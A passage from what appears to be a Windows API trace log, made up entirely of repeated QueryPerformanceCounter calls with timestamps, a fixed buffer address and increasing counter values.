lpPerformanceCount=0x6adfdfc*=3096134778209) returned 1 [0142.529] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096134791291) returned 1 [0142.545] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096136380465) returned 1 [0142.545] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096136397569) returned 1 [0142.561] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096137980632) returned 1 [0142.561] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096137994603) returned 1 [0142.577] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096139583035) returned 1 [0142.577] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096139598730) returned 1 [0142.593] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096141180713) returned 1 [0142.593] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096141194734) returned 1 [0142.609] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096142782377) returned 1 [0142.609] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096142795429) returned 1 [0142.625] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096144424822) returned 1 [0142.625] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096144450820) returned 1 [0142.641] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096145988195) returned 1 [0142.641] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096146005144) returned 1 [0142.657] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096147577614) returned 1 [0142.657] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096147590677) returned 1 [0142.673] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096149180670) returned 1 [0142.673] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096149193501) returned 1 [0142.689] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096150783259) returned 1 [0142.689] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096150796630) returned 1 [0142.705] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096152381368) returned 1 [0142.705] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096152395224) returned 1 [0142.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096154086086) returned 1 [0142.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096154099630) returned 1 [0142.738] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096155681704) returned 1 [0142.738] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096155695722) returned 1 [0142.754] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096157279059) returned 1 [0142.754] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096157292441) returned 1 [0142.770] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096158881757) returned 1 [0142.770] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096158899474) returned 1 [0142.786] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096160479342) returned 1 [0142.786] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096160491966) returned 1 [0142.801] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096162049584) returned 1 [0142.802] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096162062424) returned 1 [0142.817] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096163646117) returned 1 [0142.818] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096163658263) returned 1 [0142.833] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096165246712) returned 1 [0142.834] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096165259992) returned 1 [0142.849] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096166848359) returned 1 [0142.850] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096166861231) returned 1 [0142.865] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096168448699) returned 1 [0142.866] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096168462059) returned 1 [0142.881] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096170047963) returned 1 [0142.882] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096170064066) returned 1 [0142.898] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096171655806) returned 1 [0142.898] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096171669246) returned 1 [0142.913] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096173250481) returned 1 [0142.914] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096173264260) returned 1 [0142.929] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096174854525) returned 1 [0142.930] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096174867889) returned 1 [0142.945] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096176451080) returned 1 [0142.946] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096176465366) returned 1 [0142.961] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096178054702) returned 1 [0142.962] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096178069415) returned 1 [0142.977] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096179647079) returned 1 [0142.978] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096179661716) returned 1 [0142.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096181260393) returned 1 [0142.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096181290553) returned 1 [0143.009] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096182849062) returned 1 [0143.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096182862316) returned 1 [0143.025] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096184449516) returned 1 [0143.026] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096184462595) returned 1 [0143.041] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096186050233) returned 1 [0143.042] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096186063540) returned 1 [0143.057] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096187646945) returned 1 [0143.058] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096187660036) returned 1 [0143.073] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096189248399) returned 1 [0143.074] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096189261433) returned 1 [0143.090] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096190859660) returned 1 [0143.090] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096190985185) returned 1 [0143.105] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096192448965) returned 1 [0143.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096192462457) returned 1 [0143.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096194390323) returned 1 [0143.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096194404854) returned 1 [0143.139] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096195847651) returned 1 [0143.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096195860657) returned 1 [0143.157] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096197565190) returned 1 [0143.157] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096197617713) returned 1 [0143.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096199098835) returned 1 [0143.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096199112276) returned 1 [0143.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096200706955) returned 1 [0143.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096200720467) returned 1 [0143.204] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096202300248) returned 1 [0143.204] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096202313984) returned 1 [0143.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096204041784) returned 1 [0143.222] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096204055625) returned 1 [0143.236] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096205504617) returned 1 [0143.236] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096205519266) returned 1 [0143.252] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096207098498) returned 1 [0143.252] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096207111833) returned 1 [0143.268] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096208667876) returned 1 [0143.268] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096208681171) returned 1 [0143.284] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096210267262) returned 1 [0143.284] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096210280345) returned 1 [0143.308] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096212704275) returned 1 [0143.308] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096212739949) returned 1 [0143.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096214142756) returned 1 [0143.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096214158815) returned 1 [0143.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096215753430) returned 1 [0143.339] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096215772760) returned 1 [0143.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096217341891) returned 1 [0143.355] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096217355380) returned 1 [0143.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096218940905) returned 1 [0143.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096218955073) returned 1 [0143.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096220541014) returned 1 [0143.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096220555151) returned 1 [0143.402] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096222147443) returned 1 [0143.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096222160762) returned 1 [0143.418] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096223745490) returned 1 [0143.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096223763649) returned 1 [0143.434] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096225340232) returned 1 [0143.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096225355269) returned 1 [0143.450] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096226949979) returned 1 [0143.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096226991247) returned 1 [0143.466] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096228549039) returned 1 [0143.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096228562788) returned 1 [0143.482] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096230150672) returned 1 [0143.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096230167502) returned 1 [0143.504] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096232354456) returned 1 [0143.505] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096232377504) returned 1 [0143.514] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096233346542) returned 1 [0143.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096233363083) returned 1 [0143.596] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096241508319) returned 1 [0143.596] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096241529724) returned 1 [0143.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096241563750) returned 1 [0143.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096241581777) returned 1 [0143.612] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096243095305) returned 1 [0143.612] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096243112281) returned 1 [0143.628] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096244693484) returned 1 [0143.628] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096244709495) returned 1 [0143.644] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096246293381) returned 1 [0143.644] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096246306553) returned 1 [0143.660] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096247893414) returned 1 [0143.660] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096247908508) returned 1 [0143.676] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096249497412) returned 1 [0143.676] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096249514619) returned 1 [0143.692] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096251090581) returned 1 [0143.692] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096251104447) returned 1 [0143.708] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096252695264) returned 1 [0143.708] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096252711861) returned 1 [0143.724] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096254294334) returned 1 [0143.724] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096254311949) returned 1 [0143.740] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096255894847) returned 1 [0143.740] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096255911342) returned 1 [0143.756] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096257497358) returned 1 [0143.756] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096257513020) returned 1 [0143.772] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096259102058) returned 1 [0143.772] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096259121871) returned 1 [0143.788] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096260694396) returned 1 [0143.788] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096260710719) returned 1 [0143.804] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096262288508) returned 1 [0143.804] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096262302072) returned 1 [0143.820] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096263886753) returned 1 [0143.820] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096263899739) returned 1 [0143.836] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096265488350) returned 1 [0143.836] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096265501281) returned 1 [0143.852] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096267087900) returned 1 [0143.852] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096267100769) returned 1 [0143.868] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096268687512) returned 1 [0143.868] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096268700448) returned 1 [0143.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096270288501) returned 1 [0143.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096270301571) returned 1 [0143.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096271888664) returned 1 [0143.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096271901476) returned 1 [0143.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096273489430) returned 1 [0143.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096273502685) returned 1 [0143.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096275092221) returned 1 [0143.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096275105846) returned 1 [0143.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096276690072) returned 1 [0143.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096276702896) returned 1 [0143.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096278322697) returned 1 [0143.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096278340556) returned 1 [0143.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096279892526) returned 1 [0143.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096279905658) returned 1 [0143.996] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096281491267) returned 1 [0143.996] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096281505207) returned 1 [0144.012] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096283092118) returned 1 [0144.012] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096283106656) returned 1 [0144.028] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096284692005) returned 1 [0144.028] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096284706610) returned 1 [0144.044] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096286292817) returned 1 [0144.044] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096286306490) returned 1 [0144.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096287898094) returned 1 [0144.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096287913942) returned 1 [0144.077] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096289559613) returned 1 [0144.077] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096289587034) returned 1 [0144.092] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096291089665) returned 1 [0144.092] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096291103442) returned 1 [0144.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096292690951) returned 1 [0144.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096292705273) returned 1 [0144.128] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096294735463) returned 1 [0144.128] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096294750491) returned 1 [0144.144] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096296294538) returned 1 [0144.144] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096296307995) returned 1 [0144.160] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096297896768) returned 1 [0144.160] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096297913549) returned 1 [0144.176] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096299498348) returned 1 [0144.176] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096299517797) returned 1 [0144.192] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096301098280) returned 1 [0144.192] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096301115381) returned 1 [0144.208] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096302706436) returned 1 [0144.208] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096302733957) returned 1 [0144.224] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096304294714) returned 1 [0144.224] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096304311361) returned 1 [0144.240] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096305898768) returned 1 [0144.240] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096305917811) returned 1 [0144.256] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 